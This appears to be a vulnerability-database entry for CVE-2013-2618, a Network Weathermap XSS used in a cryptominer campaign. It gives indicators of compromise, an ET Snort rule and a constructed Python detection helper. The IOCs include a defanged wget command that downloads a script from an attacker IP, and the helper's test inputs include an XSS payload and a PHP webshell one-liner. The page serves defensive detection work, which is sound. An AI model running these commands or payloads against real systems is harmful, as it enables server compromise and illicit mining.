CVE-2013-2618
published 2014-06-05

CVE-2013-2618: Cross-site scripting (XSS) vulnerability in editor.php in Network Weathermap before 0.97b allows remote attackers to inject arbitrary web script or HTML via…

Priority: P2 · 77 · medium
CVSS 2.0: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Flags: ITW exploit · VulnCheck KEV · Ransomware
Exploited in the wild
EPSS: 4.68% (90.6th percentile)
Cross-site scripting (XSS) vulnerability in editor.php in Network Weathermap before 0.97b allows remote attackers to inject arbitrary web script or HTML via the map_title parameter.

Affected

1 range

Vendor              Product              Version range   Fixed in
network-weathermap  network_weathermap   <= 0.97         0.97b

Detection & IOCs (extracted from sources)

path: /plugins/weathermap/configs/conn.php
path: /plugins/weathermap/editor.php
ip: 222.184.79.11
port: 5317
filename: watchd0g.sh
filename: dada.x86_64
hash: 690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b
hash: 48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04
hash: 1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333
hash: 2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025
hash: d814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6
hash: 4a70da8ad6432d7aa639e6c5e0c03958eebb3728ef89e74c028807dd5d68e2b4
hash: 0adadc3799d06b35465107f98c07bd7eef5cb842b2cf09ebaeaa3773c1f02343
hash: 7f30ea52b09d6d9298f4f30b8045b77c2e422aeeb84541bb583118be2425d335
domain: pool.minexmr.com
domain: pool.supportxmr.com
domain: xmr.krbpool.com
command: wget watchd0g.sh hxxp://222[.]184[.]79[.]11:5317/watchd0g[.]sh
path: /etc/rc.local
path: /etc/crontab
snort/suricata rule (ET):
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible CVE-2013-2618 Attempt (PHP Weathermap Persistent XSS)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/editor.php"; content:"&map_title="; nocase; content:"&map_legend="; nocase; content:"&editorsettings_showrelative="; fast_pattern; nocase; content:"="; pcre:"/.+?(?:on(?:(?:s(?:elec|ubmi)|rese)t|d(?:blclick|ragdrop)|(?:mouse|key)[a-z]|c(?:hange|lick)|(?:un)?load|focus|blur)|s(?:cript|tyle=))/R"; reference:url,blog.trendmicro.com/trendlabs-security-intelligence/cryptocurrency-miner-distributed-via-php-weathermap-vulnerability-targets-linux-servers/; reference:cve,2013-2618; classtype:attempted-admin; sid:2025459; rev:5;)
  • The persistent XSS was used to write a PHP webshell to /plugins/weathermap/configs/conn.php (and cools.php); alert on any unexpected .php file created under the weathermap configs directory, which should only hold map configuration files.
  • Post-exploitation persistence: monitor for writes to /etc/rc.local and /etc/crontab by web server processes, and for the kernel parameter vm.nr_hugepages being modified (indicative of XMR mining preparation).
  • The vulnerability is also reachable through the Cacti plugin management interface; monitor GET requests to weathermap-cacti-plugin-mgmt.php?action=viewconfig&file= for path traversal or injection payloads.
  • Exploitation requires Cacti's Plugin Architecture to be enabled with an outdated Network Weathermap version (0.97a or prior); patched versions (0.97b and later) are not affected.
  • The campaign specifically targets publicly accessible Cacti instances with no authentication; instances behind authentication or not internet-facing are significantly harder to exploit.
  • The attacking IP addresses were not published as stable IOCs because the machines are assessed to be remotely controlled (likely compromised intermediaries), which reduces their detection value.
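
The rule and bullets above describe three separate checks: the shape of the malicious editor.php request, .php files appearing under the weathermap configs/ directory, and the network/host indicators. The following is an added example that implements all three as log-side helpers; it is not code from the Weathermap or Cacti projects and not the ET rule itself. The request check approximates the rule's pcre (it also flags onerror, which the rule's handler list omits, as an assumption about what a practitioner would want covered) and additionally treats a PHP open tag in map_title as the webshell case the campaign used. All sample requests, paths and syslog lines are constructed for illustration.

```python
"""Detection helpers for the CVE-2013-2618 Weathermap campaign described above.

Added example: not code from the Weathermap or Cacti projects and not the ET
rule itself. It re-implements (approximately) the request check that rule
performs, flags .php files under weathermap configs/, and greps log lines for
the IOCs listed on this page. All inputs are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Network and file indicators copied from the IOC list above.
IOC_STRINGS = {
    "222.184.79.11", "watchd0g.sh", "dada.x86_64",
    "pool.minexmr.com", "pool.supportxmr.com", "xmr.krbpool.com",
    "690aea53dae908c9afa933d60f467a17ec5f72463988eb5af5956c6cb301455b",
    "48cf0f374bc3add6e3f73f6db466f9b62556b49a9f7abbcce068ea6fb79baa04",
    "1155fae112da3072d116f39e90f6af5430f44f78638db3f43a62a9037baa8333",
    "2c7b1707564fb4b228558526163249a059cf5e90a6e946be152089f0b69e4025",
    "d814bf38f5cf7a58c3469d530d83106c4fc7653b6be079fc2a6f73a36b1b35c6",
    "4a70da8ad6432d7aa639e6c5e0c03958eebb3728ef89e74c028807dd5d68e2b4",
    "0adadc3799d06b35465107f98c07bd7eef5cb842b2cf09ebaeaa3773c1f02343",
    "7f30ea52b09d6d9298f4f30b8045b77c2e422aeeb84541bb583118be2425d335",
}
# Host-side strings the bullets above call out (persistence, miner prep).
HOST_STRINGS = {"/etc/rc.local", "/etc/crontab", "vm.nr_hugepages"}

# Approximation of the ET rule's pcre: event-handler attributes, <script,
# style=. "onerror" is not in the rule's handler list; it is added here as
# an assumption about what a practitioner would also want flagged.
INJECT_RE = re.compile(
    r"\bon(?:select|submit|reset|dblclick|dragdrop|mouse[a-z]|key[a-z]"
    r"|change|click|load|unload|focus|blur|error)\s*=|<\s*script|style\s*=",
    re.IGNORECASE,
)
# The campaign used the injection to drop PHP into configs/conn.php, so a PHP
# open tag in map_title is treated as the most severe verdict.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

REQUIRED_PARAMS = ("map_title", "map_legend", "editorsettings_showrelative")


def classify_request(method, target):
    """Classify one HTTP request (method + request-target, as in a web log).

    Returns None for traffic the rule ignores, else "editor-save", "xss"
    (HTML/JS in map_title) or "php-webshell" (PHP open tag in map_title).
    """
    url = urlsplit(target)
    if method.upper() != "POST" or not url.path.endswith("/editor.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if not all(p in params for p in REQUIRED_PARAMS):
        return None
    title = " ".join(params["map_title"])
    if PHP_TAG_RE.search(title):
        return "php-webshell"
    if INJECT_RE.search(title):
        return "xss"
    return "editor-save"


def unexpected_php_in_configs(paths):
    """Return .php files under a weathermap configs/ directory, where only map
    definitions belong (conn.php / cools.php in the campaign)."""
    return sorted(p for p in paths
                  if "/weathermap/configs/" in p and p.lower().endswith(".php"))


def ioc_hits(line):
    """Return the indicators from this page present in one log line; defanged
    forms (hxxp, [.]) are normalised first so either style matches."""
    refanged = line.replace("hxxp", "http").replace("[.]", ".")
    return sorted(s for s in IOC_STRINGS | HOST_STRINGS if s in refanged)


if __name__ == "__main__":
    # Constructed request-targets shaped like the editor's set_map_properties
    # call; the second and third carry payloads in map_title.
    base = "/plugins/weathermap/editor.php?action=set_map_properties&map_title="
    tail = "&map_legend=Traffic+Load&editorsettings_showrelative=0"
    for payload in ("Core+Network",
                    "%3Csvg+onload%3Dalert%281%29%3E",
                    "%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B%3F%3E"):
        print(payload, "->", classify_request("POST", base + payload + tail))
    print(unexpected_php_in_configs([
        "/var/www/html/plugins/weathermap/configs/simple.conf",
        "/var/www/html/plugins/weathermap/configs/conn.php",
        "/var/www/html/plugins/weathermap/editor.php",
    ]))
    # Constructed syslog line modelled on the download command IOC above.
    print(ioc_hits("Mar 21 04:12:07 web1 sh[2193]: wget "
                   "hxxp://222[.]184[.]79[.]11:5317/watchd0g[.]sh"))
```

The request check looks only at map_title, the parameter named in the CVE, whereas the ET rule's pcre runs against any value after an "=" in the URI; tighten or widen to taste, but keep the three-parameter requirement, which is what keeps ordinary editor saves from tripping the HTML checks.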

CVSS provenance

nvd        v2.0  4.3  MEDIUM  AV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck        4.3  MEDIUM